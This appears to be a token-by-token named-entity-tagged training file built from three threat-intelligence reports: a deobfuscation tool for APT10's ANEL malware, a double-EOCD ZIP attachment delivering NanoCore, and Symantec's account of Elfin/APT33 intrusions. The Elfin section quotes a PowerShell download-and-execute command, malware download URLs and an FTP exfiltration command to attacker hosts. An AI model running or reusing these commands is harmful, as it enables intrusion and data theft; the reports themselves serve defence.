example O
, O

the O
following O
microcode O
graph O
shows O
edi O
is O
assigned O
to O
esi O
( O
the O
block O
comparison O
variable O
in O
this O
case O
) O

in O
block O
number O
7 O
but O
the O
edi O
value O
is O
assigned O
in O
block O
number O
1 O
and O
2 O
. O

If O
the O
immediate O
value O
for O
block O
comparison O
variable O
is O
not O
found O
in O
the O
flattened O
blocks O
, O

the O
new O
code O
tries O
to O
trace O
the O
first O
blocks O
to O
obtain O
the O
value O
and O
reconnects O
block O
number O
1 O
and O
2 O
as O
successors O
of O
block O
number O
7 O
, O

in O
addition O
to O
normal O
operations O
mentioned O
in O
the O
original O
cases O
. O

In O
this O
case O
, O

the O
code O
parses O
the O
structure O
in O
first O
blocks O
then O
reconnects O
each O
conditional O
blocks O
under O
the O
flattened O
blocks O
( O
#1 O
and O
#2 O
as O
successors O
of O
#13 O
, O

#3 O
and O
#4 O
as O
successors O
of O
#11 O
) O

. O

Last O
, O

but O
not O
least O
, O

in O
all O
cases O
explained O
here O
, O

the O
tail O
instruction O
of O
the O
dispatcher O
predecessor O
can O
be O
a O
conditional O
jump O
like O
jnz O
, O

not O
just O
goto O
. O

The O
modified O
code O
checks O
the O
tail O
instruction O
and O
if O
the O
true O
case O
destination O
is O
a O
control O
flow O
dispatcher O
, O

it O
updates O
the O
CFG O
and O
the O
destination O
of O
the O
instruction O
. O

The O
following O
changes O
are O
minor O
compared O
with O
above O
referenced O
ones O
. O

Additional O
jump O
instructions O
are O
supported O
when O
collecting O
block O
comparison O
variable O
candidates O
and O
mapping O
between O
the O
variable O
and O
ea O
or O
block O
number O
( O
jnz/jle O
in O
JZCollector S-TOOL
, O

jnz O
in O
JZMapper S-TOOL
) O

. O

An O
entropy O
threshold O
adjustment O
due O
to O
check O
in O
high O
maturity O
level O
. O

Multiple O
block O
tracking O
for O
getting O
block O
comparison O
variable O
. O

And O
the O
last O
change O
that O
was O
introduced O
in O
regards O
to O

the O
block O
update O
variable O
referred O
in O
the O
overview O
. O

Some O
functions O
in O
the O
ANEL S-MAL
sample O
utilize O
this O
, O

however O
the O
assignment O
is O
a O
little O
bit O
tricky O
. O

By O
using O
the O
and O
instruction O
, O

the O
immediate O
values O
used O
in O
comparison O
look O
different O
from O
assigned O
ones O
. O

The O
modified O
code O
will O
consider O
this O
. O

The O
modified O
tool O
was O
tested O
with O
an O
ANEL S-MAL
5.4.1 O
payload O
dropped O
from O
a O
malicious O
document O
with O
the O
following O
hash O
( O
previously O
reported O
by O
FireEye S-SECTEAM
) O
: O

3d2b3c9f50ed36bef90139e6dd250f140c373664984b97a97a5a70333387d18d S-SHA2
. O

The O
code O
is O
able O
to O
deobfuscate O
34 O
of O
38 O
functions O
( O
89% O
) O

. O

It O
should O
be O
noted O
every O
function O
is O
not O
always O
obfuscated O
. O

The O
failure O
examples O
are O
: O


Not O
yet O
implemented O
cases O
( O
e.g O
, O

a O
conditional O
jump O
of O
the O
dispatcher O
predecessor’s O
tail O
instruction O
in O
goto O
N O
predecessors O
case O
, O

consecutive O
if-statement O
flattened O
blocks O
) O

. O

An O
incorrect O
choice O
of O
control O
flow O
dispatcher O
and O
first O
block O
( O
algorithm O
error O
) O

. O

These O
fixes O
will O
be O
prioritized O
for O
future O
releases O
. O

Additionally O
there O
is O
a O
known O
issue O
with O
the O
result O
( O
e.g O
, O
the O
remaining O
loop O
or O
paradoxical O
decompiled O
code O
) O

, O

using O
the O
following O
IDAPython S-TOOL
command O
in O
Output O
window O
: O


idc.load_and_run_plugin O

( O

“ O
HexRaysDeob S-TOOL
” O

, O

0xdead O
) O

. O

The O
command O
will O
instruct O
the O
code O
to O
execute O
only O
opaque O
predicates O
deobfuscation O
in O
the O
current O
selected O
function O
. O

This O
allows O
an O
analyst O
to O
quickly O
check O
if O
there O
are O
any O
lost O
blocks O
by O
control O
flow O
unflattening O
. O

After O
the O
check O
, O

the O
original O
result O
can O
be O
restored O
by O
using O
the O
following O
command O
: O


idc.load_and_run_plugin O

( O

“ O
HexRaysDeob S-TOOL
” O

, O

0xf001 O
) O

. O

The O
compiler-level O
obfuscations O
like O
opaque O
predicates O
and O
control O
flow O
flattening O
are O
started O
to O
be O
observed O
in O
the O
wild O
by O
analyst O
and O
researchers O
. O

Currently O
malware O
with O
the O
obfuscations O
is O
limited O
, O

however O
TAU S-SECTEAM
expects O
not O
only O
APT10 S-APT
but O
also O
other O
threat O
actors O
will O
start O
to O
use O
them O
. O

Unfortunately O
, O

in O
order O
to O
break O
the O
techniques O
we O
have O
to O
understand O
both O
of O
the O
obfuscation O
mechanisms O
and O
disassembler O
tool O
internals O
before O
we O
can O
automate O
the O
process O
. O

TAU S-SECTEAM
modified O
the O
original O
HexRaysDeob S-TOOL
to O
make O
it O
work O
for O
APT10 S-APT
ANEL S-MAL
obfuscations O
. O

The O
modified O
code O
is O
available O
publically O
here O
. O

The O
summary O
of O
the O
modifications O
is O
: O


New O
patterns O
and O
data-flow O
tracking O
for O
opaque O
predicates O
. O

Analysis O
in O
multiple O
maturity O
levels O
, O

considering O
multiple O
control O
flow O
dispatchers O
and O
various O
jump O
cases O
for O
control O
flow O
flattening O
. O

The O
tool O
can O
work O
for O
almost O
all O
obfuscated O
functions O
in O
the O
tested O
sample O
. O

This O
implementation O
will O
deobfuscate O
approximately O
89% O
of O
encountered O
functions O
. O

This O
provides O
researchers O
and O
analyst O
broad O
tool O
to O
attack O
this O
type O
of O
obfuscation O
, O

and O
if O
it O
adopted O
in O
other O
families O
. O

In O
should O
be O
noted O
that O
the O
tool O
may O
not O
work O
for O
the O
updated O
versions O
of O
ANEL S-APT
if O
they O
are O
compiled O
with O
different O
options O
of O
the O
obfuscating O
compiler O
. O

Testing O
in O
multiple O
versions O
is O
important O
, O

so O
TAU S-SECTEAM
is O
looking O
for O
newer O
versions O
ANEL S-APT
samples O
. O

Please O
reach O
out O
to O
our O
unit O
if O
you O
have O
relevant O
samples O
or O
need O
assistance O
in O
deobfuscating O
the O
codes O
. O


Double O
Loaded O
Zip O
File O
Delivers O
Nanocore O
Most O
malware O
sent O
via O
emails S-TOOL
is O
packaged O
in O
archives O
such O
as O
ZIP, O
RAR, O
and O
7z O
(7-Zip
) O
. O

Occasionally, O
we O
encounter O
some O
clever O
and O
creative O
ways O
these O
malicious O
archives O
are O
crafted
. O

Here O
we O
will O
examine O
an O
example O
of O
an O
oddly O
formatted O
ZIP O
archive O
hiding O
the O
NanoCore S-MAL
malware
. O

We O
spotted O
a O
courier O
themed O
spam O
campaign O
on O
our O
Secure B-TOOL
Email I-TOOL
Gateway E-TOOL
(SEG S-TOOL
) O
cloud O
recently
. O

The O
message O
claimed O
to O
be O
from O
an O
Export O
Operation O
Specialist O
of O
USCO B-IDTY
Logistics E-IDTY
and O
that O
it O
was O
sent O
as O
per O
their O
customer O
request
. O

Aside O
from O
this, O
there O
were O
several O
other O
suspicious O
items O
we O
noted: O
Headers O
mismatched: O
The O
Reply-To O
and O
From O
email S-TOOL
address O
were O
different
. O

Furthermore, O
the O
email S-TOOL
address O
used O
in O
Reply-To O
is O
from O
a O
free O
email S-TOOL
client O
Gmail
. O

Suspicious O
message O
body: O
The O
attachment O
was O
mentioned O
in O
the O
message O
body O
twice, O
making O
sure O
to O
direct O
the O
reader’s O
attention O
towards O
the O
attachment
. O

Suspicious O
attachment O
name: O
The O
name O
of O
attachment O
SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE
ends O
with O
pdf.zip S-FILE
. O

That O
usually O
means O
that O
the O
name O
of O
the O
file O
inside O
the O
archive O
ends O
with O
2 O
known O
file O
extensions O
“pdf.<extension>” O
(archiving O
tools O
usually O
defaults O
the O
<extension> O
to O
the O
archive’s O
format O
e.g. O
zip
) O
. O

The O
attachment O
SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE
makes O
this O
message O
stand O
out
. O

The O
ZIP O
file O
had O
a O
file O
size O
significantly O
greater O
than O
that O
of O
its O
uncompressed O
content
. O

Typically, O
the O
size O
of O
the O
ZIP O
file O
should O
be O
less O
than O
the O
uncompressed O
content O
or, O
in O
some O
cases, O
ZIP O
files O
will O
grow O
larger O
than O
the O
original O
files O
by O
a O
reasonable O
number O
of O
bytes
. O

ZIP O
archives O
are O
supposed O
to O
have O
one O
“End O
of O
Central O
Directory” O
(EOCD) O
signifying O
the O
end O
of O
the O
archive
. O

Looking O
deeper O
into O
the O
structure O
of O
SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE
, O
the O
attachment O
has O
two O
EOCDs
. O

After O
the O
first O
EOCD O
comes O
some O
extra O
data O
– O
another O
ZIP O
file O
structure
. O

It O
turns O
out O
that O
the O
first O
ZIP O
structure O
is O
for O
the O
image O
file O
order.jpg S-FILE
while O
the O
second O
one O
is O
for O
an O
executable O
file O
SHIPPING_MX00034900_PL_INV_pdf.exe S-FILE
. O

Both O
are O
compressed O
when O
archived, O
and O
both O
indicate O
that O
they O
are O
the O
only O
file O
in O
their O
ZIP O
structures O
as O
indicated O
in O
their O
local O
file O
headers O
and O
EOCDs O
respectively
. O

The O
image O
file O
“order.jpg” O
contained O
in O
the O
first O
ZIP O
structure O
is O
actually O
a O
non-malicious O
PNG O
formatted O
image O
file
. O

This O
serves O
as O
a O
decoy, O
an O
attempt O
to O
hide O
the O
content O
of O
the O
other O
ZIP O
structure
. O

The O
image O
file O
has O
been O
correctly O
identified O
by O
SEG O
as O
a O
PNG O
when O
its O
file O
extension O
is O
.jpg S-FILE
denoting O
a O
JPEG O
formatted O
image
. O

The O
second O
ZIP O
structure O
contains O
SHIPPING_MX00034900_PL_INV_pdf.exe S-FILE
, O
which O
is O
a O
NanoCore S-MAL
RAT
. O

This O
remote O
access O
Trojan S-MAL
has O
the O
capability O
that O
allows O
an O
attacker O
to O
completely O
take O
control O
of O
the O
compromised O
machine
. O

It O
connects O
to O
its O
command O
and O
control O
server O
at O
194.5.98.85 S-IP
on O
port O
11903
. O

This O
NanoCore S-MAL
RAT O
is O
version O
1.2.2.0 O
which O
has O
been O
found O
to O
be O
offered O
for O
free O
on O
the O
Dark B-IDTY
Web E-IDTY
just O
a O
few O
months O
ago
. O

We O
used O
different O
archiving O
tools O
such O
as O
PowerArchiver B-TOOL
2019 E-TOOL
, O
WinZip S-TOOL
, O
WinRar S-TOOL
, O
7Zip S-TOOL
, O
and O
unzIP S-TOOL S-TOOL
that O
is O
built O
into O
the O
Windows S-OS
OS O
in O
attempting O
to O
extract O
the O
content O
of O
the O
attachment O
SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE
. O

Among O
these O
5 O
tools, O
only O
WinZip S-TOOL
and O
Windows’ O
unzIP S-TOOL S-TOOL
were O
not O
able O
to O
extract O
anything O
from O
the O
ZIP O
file O
as O
they O
encountered O
an O
error O
at O
the O
start O
of O
the O
extraction O
process
. O

The O
other O
archiving O
tools O
were O
able O
to O
extract O
one O
file O
from O
the O
ZIP O
attachment O
– O
either O
order.jpg B-FILE
or I-FILE
SHIPPING_MX00034900_PL_INV_pdf.exe E-FILE
. O


WinZip S-TOOL
version O
11.2 O
and O
24.0, O
and O
the O
built-in O
unzIP S-TOOL S-TOOL
tool O
in O
Windows S-OS
, O
recognized O
that O
the O
attachment O
SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE
is O
an O
invalid O
archive
. O

Only O
WinZip S-TOOL
gave O
an O
explicit O
reason O
– O
the O
start O
of O
central O
directory O
of O
the O
ZIP O
was O
not O
found
. O

The O
central O
directory O
it O
pertained O
to O
is O
the O
one O
in O
the O
second O
ZIP O
structure
. O

At O
figure O
2, O
the O
second O
EOCD O
indicates O
that O
its O
only O
central O
directory O
is O
located O
at O
file O
offset O
0xd148f O
whereas O
it O
is O
at O
0xd40d41. O
(The O
size O
of O
the O
first O

ZIP O
structure O
was O
not O
considered.) O
Meanwhile, O
the O
archiving O
tools O
PowerArchiver B-TOOL
2019 E-TOOL
, O
WinRar S-TOOL
, O
and O
7Zip S-TOOL
were O
able O
to O
extract O
a O
file O
from O
the O
attachment O
SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE
. O

The O
latest O
versions O
of O
PowerArchiver B-TOOL
2019 E-TOOL
and O
WinRar S-TOOL
displayed O
in O
their O
respective O
UI O
the O
executable O
SHIPPING_MX00034900_PL_INV_pdf.exe S-FILE
as O
the O
only O
content O
of O
the O
ZIP O
attachment
. O

No O
error O
or O
warning O
was O
prompted O
during O
the O
extraction
. O

Older O
versions O
of O
7Zip S-TOOL
also O
behave O
like O
PowerArchiver S-TOOL
and O
WinRAR S-TOOL
. O
7Zip S-TOOL
version O
9.22 O
and O
older O
saw O
the O
executable O
as O
well
. O

However, O
starting O
from O
7Zip S-TOOL
version O
9.34 O
(next O
available O
installer O
after O
version O
9.22) O
up O
to O
its O
latest O
version O
19.0, O
7zip S-TOOL
saw O
and O
was O
able O
to O
extract O
the O
image O
file O
order.jpg S-FILE
instead
. O

The O
second O
ZIP O
structure O
was O
treated O
as O
extra O
data; O
hence, O
a O
warning O
was O
added O
to O
the O
extracted O
image O
file’s O
properties
. O

Among O
the O
archiving O
tools O
we O
tried, O
WinRar S-TOOL
3.30 O
behaved O
differently O
and O
unexpectedly
. O

The O
content O
of O
the O
ZIP O
attachment O
it O
displayed O
in O
its O
UI O
was O
not O
the O
one O
it O
extracted! O
This O
sample O
challenges O
gateways O
scanners
. O

Depending O
on O
the O
type O
of O
decompression O
engine O
used, O
there O
is O
a O
good O
probability O
that O
only O
the O
decoy O
file O
may O
be O
scrutinized O
and O
vetted, O
and O
the O
malicious O
content O
unnoticed O
– O
just O
like O
how O
some O
of O
the O
most O
popular O
archiving O
tools O
failed O
to O
notice O
the O
second O
ZIP O
structure
. O

Despite O
what O
the O
gateway O
does, O
this O
attack O
would O
only O
succeed O
if O
the O
message O
got O
through O
the O
gateway O
and O
a O
particular O
archive O
utility O
is O
used O
by O
the O
end-user, O
such O
as O
certain O
versions O
of O
PowerArchiver S-TOOL
, O
WinRar S-TOOL
, O
and O
older O
7Zip S-TOOL
as O
described O
above
. O

In O
this O
case, O
the O
Trustwave O
Secure O
email S-TOOL
Gateway O
flagged O
the O
message O
as O
suspicious O
and O
it O
did O
not O
get O
through
. O

Nevertheless, O
this O
case O
does O
highlight O
the O
types O
of O
tricks O
the O
bad O
guys O
are O
using O
in O
an O
attempt O
to O
deliver O
malware O
through O
email
. O

SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE
: O
9474e1517c98d4165300a49612888d16643efbf6 S-SHA1
. O


Elfin S-APT
: O
Relentless O
Espionage O
Group O
Targets O
Multiple O
Organizations O
in O
Saudi B-LOC
Arabia E-LOC
and O
U.S S-LOC
. O

The O
Elfin S-APT
espionage O
group O
( O
aka O
APT33 S-APT
) O
has O
remained O
highly O
active O
over O
the O
past O
three O
years O
, O
attacking O
at O
least O
50 O
organizations O
in O
Saudi B-LOC
Arabia E-LOC
, O
the O
United B-LOC
States E-LOC
, O
and O
a O
range O
of O
other O
countries O
. O

The O
group O
, O
which O
first O
became O
active O
in O
late O
2015 S-TIME
or O
early O
2016 S-TIME
, O
specializes O
in O
scanning O
for O
vulnerable O
websites O
and O
using O
this O
to O
identify O
potential O
targets O
, O
either O
for O
attacks O
or O
creation O
of O
command O
and O
control O
( O
C&C O
) O
infrastructure O
. O

It O
has O
compromised O
a O
wide O
range O
of O
targets O
, O
including O
governments S-IDTY
along O
with O
organizations O
in O
the O
research O
, O
chemical O
, O
engineering O
, O
manufacturing O
, O
consulting O
, O
finance O
, O
telecoms O
, O
and O
several O
other O
sectors O
. O

Elfin S-APT
continues O
to O
be O
focused O
heavily O
on O
Saudi B-LOC
Arabia E-LOC
, O
which O
accounted O
for O
42 O
percent O
of O
attacks O
observed O
by O
Symantec S-SECTEAM
since O
the O
beginning O
of O
2016 S-TIME
. O

However O
, O
the O
U.S. S-LOC
has O
also O
been O
a O
country O
of O
significant O
interest O
to O
the O
group O
, O
with O
18 O
organizations O
attacked O
over O
the O
past O
three O
years O
, O
including O
a O
number O
of O
Fortune O
500 O
companies O
. O

Elfin S-APT
targets O
in O
the O
U.S. S-LOC
have O
included O
organizations O
in O
the O
engineering O
, O
chemical O
, O
research O
, O
energy O
consultancy O
, O
finance O
, O
IT O
, O
and O
healthcare O
sectors O
. O

Some O
of O
these O
U.S. S-LOC
organizations O
may O
have O
been O
targeted O
by O
Elfin S-APT
for O
the O
purpose O
of O
mounting O
supply O
chain O
attacks O
. O

In O
one O
instance O
, O
a O
large O
U.S. S-LOC
company O
was O
attacked O
in O
the O
same O
month O
a O
Middle B-LOC
Eastern E-LOC
company O
it O
co-owns O
was O
also O
compromised O
. O

In O
a O
recent O
wave O
of O
attacks O
during O
February B-TIME
2019 E-TIME
, O
Elfin S-APT
attempted O
to O
exploit O
a O
known O
vulnerability O
( O
CVE-2018-20250 S-VULID
) O
in O
WinRAR S-TOOL
, O
the O
widely O
used O
file O
archiving O
and O
compression O
utility O
capable O
of O
creating O
self-extracting O
archive O
files O
. O

The O
exploit O
was O
used O
against O
one O
target O
in O
the O
chemical O
sector O
in O
Saudi B-LOC
Arabia E-LOC
. O

If O
successfully O
exploited O
on O
an O
unpatched O
computer O
, O
the O
vulnerability O
could O
permit O
an O
attacker O
to O
install O
any O
file O
on O
the O
computer O
, O
which O
effectively O
permits O
code O
execution O
on O
the O
targeted O
computer O
. O

Two O
users O
in O
the O
targeted O
organization O
received O
a O
file O
called O
" O
JobDetails.rar S-FILE
" O
, O
which O
attempted O
to O
exploit O
the O
WinRAR S-TOOL
vulnerability O
. O

This O
file O
was O
likely O
delivered O
via O
a O
spear-phishing B-ACT
email E-ACT
. O

However O
, O
prior O
to O
this O
attempted O
attack O
, O
Symantec S-SECTEAM
had O
rolled O
out O
proactive O
protection O
against O
any O
attempt O
to O
exploit O
this O
vulnerability O
( O
Exp.CVE-2018-20250 S-VULID
) O
. O

This O
protection O
successfully O
protected O
the O
targeted O
organization O
from O
being O
compromised O
. O

Elfin S-APT
came O
under O
the O
spotlight O
in O
December B-TIME
2018 E-TIME
when O
it O
was O
linked O
with O
a O
new O
wave O
of O
Shamoon S-APT
attacks O
. O

One O
Shamoon S-APT
victim O
in O
Saudi B-LOC
Arabia E-LOC
had O
recently O
also O
been O
attacked O
by O
Elfin S-APT
and O
had O
been O
infected O
with O
the O
Stonedrill S-MAL
malware O
( O
Trojan.Stonedrill S-MAL
) O
used O
by O
Elfin S-APT
. O

Because O
the O
Elfin S-APT
and O
the O
Shamoon S-APT
attacks O
against O
this O
organization O
occurred O
so O
close O
together O
, O
there O
has O
been O
speculation O
that O
the O
two O
groups O
may O
be O
linked O
. O

However O
, O
Symantec S-SECTEAM
has O
found O
no O
further O
evidence O
to O
suggest O
Elfin S-APT
was O
responsible O
for O
these O
Shamoon S-APT
attacks O
to O
date O
. O

We O
continue O
to O
monitor O
the O
activities O
of O
both O
groups O
closely O
. O

Elfin S-APT
has O
deployed O
a O
wide O
range O
of O
tools O
in O
its O
attacks O
including O
custom O
malware O
, O
commodity O
malware O
, O
and O
open-source O
hacking O
tools O
. O

Custom O
malware O
used O
by O
the O
group O
include O
: O

Notestuk S-MAL
( O
Backdoor.Notestuk S-MAL
) O
( O
aka O
TURNEDUP S-MAL
) O
: O
Malware O
that O
can O
be O
used O
to O
open O
a O
backdoor O
and O
gather O
information O
from O
a O
compromised O
computer O
. O

Stonedrill S-MAL
( O
Trojan.Stonedrill S-MAL
) O
: O
Custom O
malware O
capable O
of O
opening O
a O
backdoor O
on O
an O
infected O
computer O
and O
downloading O
additional O
files O
. O

The O
malware O
also O
features O
a O
destructive O
component O
, O
which O
can O
wipe O
the O
master O
boot O
record O
of O
an O
infected O
computer O
. O

AutoIt B-MAL
backdoor E-MAL
: O
A O
custom O
built O
backdoor O
written O
in O
the O
AutoIt O
scripting O
language O
. O

In O
addition O
to O
its O
custom O
malware O
, O
Elfin S-APT
has O
also O
used O
a O
number O
of O
commodity O
malware O
tools O
, O
available O
for O
purchase O
on O
the O
cyber O
underground O
. O

These O
include O
: O

Remcos S-MAL
( O
Backdoor.Remvio S-MAL
) O
: O
A O
commodity O
remote O
administration O
tool O
( O
RAT O
) O
that O
can O
be O
used O
to O
steal O
information O
from O
an O
infected O
computer O
. O

DarkComet S-MAL
( O
Backdoor.Breut S-MAL
) O
: O
Another O
commodity O
RAT O
used O
to O
open O
a O
backdoor O
on O
an O
infected O
computer O
and O
steal O
information O
. O

Quasar B-MAL
RAT E-MAL
( O
Trojan.Quasar S-MAL
) O
: O
Commodity O
RAT O
that O
can O
be O
used O
to O
steal O
passwords O
and O
execute O
commands O
on O
an O
infected O
computer O
. O

Pupy B-MAL
RAT E-MAL
( O
Backdoor.Patpoopy S-MAL
) O
: O
Commodity O
RAT O
that O
can O
open O
a O
backdoor O
on O
an O
infected O
computer O
. O

NanoCore S-MAL
( O
Trojan.Nancrat S-MAL
) O
: O
Commodity O
RAT O
used O
to O
open O
a O
backdoor O
on O
an O
infected O
computer O
and O
steal O
information O
. O

NetWeird S-MAL
( O
Trojan.Netweird.B S-MAL
) O
: O
A O
commodity O
Trojan S-MAL
which O
can O
open O
a O
backdoor O
and O
steal O
information O
from O
the O
compromised O
computer O
. O

It O
may O
also O
download O
additional O
potentially O
malicious O
files O
. O

Elfin S-APT
also O
makes O
frequent O
use O
of O
a O
number O
of O
publicly O
available O
hacking O
tools O
, O
including O
: O

LaZagne S-MAL
( O
SecurityRisk.LaZagne S-MAL
) O
: O
A O
login/password O
retrieval O
tool O
. O

Mimikatz S-MAL
( O
Hacktool.Mimikatz S-MAL
) O
: O
Tool O
designed O
to O
steal O
credentials O
. O

Gpppassword S-MAL
: O
Tool O
used O
to O
obtain O
and O
decrypt O
Group O
Policy O
Preferences O
( O
GPP O
) O
passwords O
. O

SniffPass S-MAL
( O
SniffPass S-MAL
) O
: O
Tool O
designed O
to O
steal O
passwords O
by O
sniffing O
network O
traffic O
. O

In O
this O
section O
, O
we O
describe O
in O
detail O
an O
Elfin S-APT
attack O
on O
a O
U.S. S-LOC
organization O
. O

On O
February B-TIME
12 I-TIME
, I-TIME
2018 I-TIME
at I-TIME
16:45 E-TIME
( O
all O
times O
are O
in O
the O
organization’s O
local O
time O
) O
, O
an O
email S-TOOL
was O
sent O
to O
the O
organization O
advertising O
a O
job O
vacancy O
at O
an O
American S-LOC
global O
service O
provider O
. O

The O
email S-TOOL
contained O
a O
malicious O
link O
to O
http://mynetwork.ddns.net:880 S-URL
. O

The O
recipient O
clicked O
the O
link O
and O
proceeded O
to O
download O
and O
open O
a O
malicious O
HTML O
executable O
file O
, O
which O
in O
turn O
loaded O
content O
from O
a O
C&C O
server O
via O
an O
embedded O
iframe O
. O

At O
the O
same O
time O
, O
code O
embedded O
within O
this O
file O
also O
executed O
a O
powershell S-TOOL
command O
to O
download O
and O
execute O
a O
copy O
of O
chfeeds.vbe S-FILE
from O
the O
C&C B-TOOL
server E-TOOL
. O
[System.Net.ServicePointManager] O
: O
:S O
erverCertificateValidationCallback={$true};IEX O
(New-Object O
Net.WebClient O
) O
.DownloadString O
( O
' O
https://217.147.168.46:8088/index.jpg S-URL
' O
) O
. O

A O
second O
JavaScript O
command O
was O
also O
executed O
, O
which O
created O
a O
scheduled O
task O
to O
execute O
chfeeds.vbe S-FILE
multiple O
times O
a O
day O
. O

The O
chfeeds.vbe S-FILE
file O
acts O
as O
a O
downloader O
and O
was O
used O
to O
download O
a O
second O
powershell S-TOOL
script O
( O
registry.ps1 S-FILE
) O
. O

This O
script O
in O
turn O
downloaded O
and O
executed O
a O
PowerShell B-MAL
backdoor E-MAL
known O
as O
POSHC2 S-MAL
, O
a O
proxy-aware B-TOOL
C&C I-TOOL
framework E-TOOL
, O
from O
the O
C&C O
server O
( O
https:// B-URL
host-manager.hopto.org E-URL
) O
. O

Later O
at O
20:57 S-TIME
, O
the O
attackers O
became O
active O
on O
the O
compromised O
machine O
and O
proceeded O
to O
download O
the O
archiving O
tool O
WinRAR S-TOOL
. O
89.34.237.118 B-IP
808 E-IP
http://89.34.237.118:808/Rar32.exe S-URL
. O

At O
23:29 S-TIME
, O
the O
attackers O
then O
proceeded O
to O
deploy O
an O
updated O
version O
of O
their O
POSHC2 S-MAL
stager O
. O
192.119.15.35 B-IP
880 E-IP
http://mynetwork.ddns.net:880/st-36-p4578.ps1 S-URL
. O

This O
tool O
was O
downloaded O
several O
times O
between O
23:29 B-TIME
on I-TIME
February I-TIME
12 E-TIME
and O
07:47 B-TIME
on I-TIME
February I-TIME
13 E-TIME
. O

Two O
days O
later O
, O
on O
February B-TIME
14 I-TIME
at I-TIME
15:12 E-TIME
, O
the O
attackers O
returned O
and O
installed O
Quasar B-MAL
RAT E-MAL
onto O
the O
infected O
computer O
that O
communicated O
with O
a O
C&C O
server O
( O
217.147.168.123 S-IP
) O
. O

Quasar B-MAL
RAT E-MAL
was O
installed O
to O
CSIDL_PROFILE\appdata\roaming\microsoft\crypto\smss.exe S-FILE
. O

At O
this O
point O
, O
the O
attackers O
ceased O
activity O
while O
maintaining O
access O
to O
the O
network O
until O
February B-TIME
21 E-TIME
. O

At O
06:38 S-TIME
, O
the O
attackers O
were O
observed O
downloading O
a O
custom O
.NET B-MAL
FTP E-MAL
tool O
to O
the O
infected O
computer O
. O
192.119.15.36 B-IP
880 E-IP
http://192.119.15.36:880/ftp.exe S-URL
. O

Later O
at O
6:56 S-TIME
, O
the O
attackers O
exfiltrated O
data O
using O
this O
FTP S-TOOL
tool O
to O
a O
remote O
host: O
JsuObf.exe S-FILE
Nup#Tntcommand O
-s O
CSIDL_PROFILE\appdata\roaming\adobe\rar O
-a O
ftp://89.34.237.118:2020 O
-f/[REDACTED]-u[REDACTED]-p[REDACTED] O
. O

Activity O
ceased O
until O
the O
attackers O
returned O
on O
March B-TIME
5 E-TIME
and O
were O
observed O
using O
Quasar B-MAL
RAT E-MAL
to O
download O
a O
second O
custom O
AutoIt B-MAL
FTP E-MAL
Exfiltration S-ACT
tool O
known O
as O
FastUploader S-MAL
from O
http://192.119.15.36:880/ftp.exe S-URL
. O

This O
tool O
was O
then O
installed O
to O
csidl_profile\appdata\roaming\adobe\ftp.exe S-FILE
. O

FastUploader S-MAL
is O
a O
custom O
FTP S-TOOL
tool O
designed O
to O
exfiltrate O
data O
at O
a O
faster O
rate O
than O
traditional O
FTP S-TOOL
clients O
. O

At O
this O
point O
, O
additional O
activity O
from O
the O
attackers O
continued O
between O
March B-TIME
5 E-TIME
into O
April S-TIME
, O
and O
on O
April B-TIME
18 I-TIME
at I-TIME
11:50 E-TIME
, O
a O
second O
remote O
access O
tool O
known O
as O
DarkComet S-MAL
was O
deployed O
to O
csidl_profile\appdata\roaming\microsoft\windows\start O
menu\programs\startup\smss.exe S-FILE
on O
the O
infected O
computer O
. O

This O
was O
quickly O
followed O
15 O
seconds O
later O
by O
the O
installation O
of O
a O
credential O
dumping O
to O
csidl_profile\appdata\roaming\microsoft\credentials\dwm32.exe S-FILE
, O
and O
the O
execution O
of O
powershell S-TOOL
commands O
via O
PowerShell B-TOOL
Empire E-TOOL
, O
a O
freely O
available O
post-exploitation O
framework O
, O
to O
bypass O
logging O
on O
the O
infected O
machine O
. O

Activity O
continued O
throughout O
April S-TIME
where O
additional O
versions O
of O
DarkComet S-MAL
, O
POSHC2 S-MAL
implants O
, O
and O
an O
AutoIt B-MAL
backdoor E-MAL
were O
deployed O
along O
with O
further O
credential O
dumping O
activities O
. O

Elfin S-APT
is O
one O
of O
the O
most O
active O
groups O
currently O
operating O
in O
the O
Middle B-LOC
East E-LOC
, O
targeting O
a O
large O
number O
of O
organizations O
across O
a O
diverse O
range O
of O
sectors O
. O

Over O
the O
past O
three O
years O
, O
the O
group O
has O
utilized O
a O
wide O
array O
of O
tools O
against O
its O
victims O
, O
ranging O
from O
custom O
built O
malware O
to O
off-the-shelf O
RATs O
, O
indicating O
a O
willingness O
to O
continually O
revise O
its O
tactics O
and O
find O
whatever O
tools O
it O
takes O
to O
compromise O
its O
next O
set O
of O
victims O
. O

Symantec O
has O
the O
following O
protection O
in O
place O
to O
protect O
customers O
against O
these O
attacks O
, O
APT33 S-APT
: O
Backdoor.Notestuk S-MAL
Trojan.Stonedrill S-MAL
Backdoor.Remvio S-MAL
Backdoor.Breut S-MAL
Trojan.Quasar S-MAL
Backdoor.Patpoopy S-MAL
Trojan.Nancrat S-MAL
Trojan.Netweird.B S-MAL
Exp.CVE-2018-20250 S-VULID
SecurityRisk.LaZagne S-MAL
Hacktool.Mimikatz S-MAL
SniffPass S-MAL
. O

APT33 S-APT
: O
5798aefb07e12a942672a60c2be101dc26b01485616713e8be1f68b321747f2f S-SHA2	Notestuk/TURNEDUP S-MAL
. O

APT33 S-APT
: O
a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449 S-SHA2	AutoIt B-MAL
backdoor E-MAL
. O

APT33 S-APT
: O
f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5 S-SHA2	Gpppassword S-MAL
. O

APT33 S-APT
: O
87e2cf4aa266212aa8cf1b1c98ae905c7bac40a6fc21b8e821ffe88cf9234586 S-SHA2	LaZagne S-MAL
. O

APT33 S-APT
: O
709df1bbd0a5b15e8f205b2854204e8caf63f78203e3b595e0e66c918ec23951 S-SHA2	LaZagne S-MAL
. O

APT33 S-APT
: O
a23c182349f17398076360b2cb72e81e5e23589351d3a6af59a27e1d552e1ec0 S-SHA2	Quasar B-MAL
RAT E-MAL
. O

APT33 S-APT
: O
0b3610524ff6f67c59281dbf4a24a6e8753b965c15742c8a98c11ad9171e783d S-SHA2	Quasar B-MAL
RAT E-MAL
. O

APT33 S-APT
: O
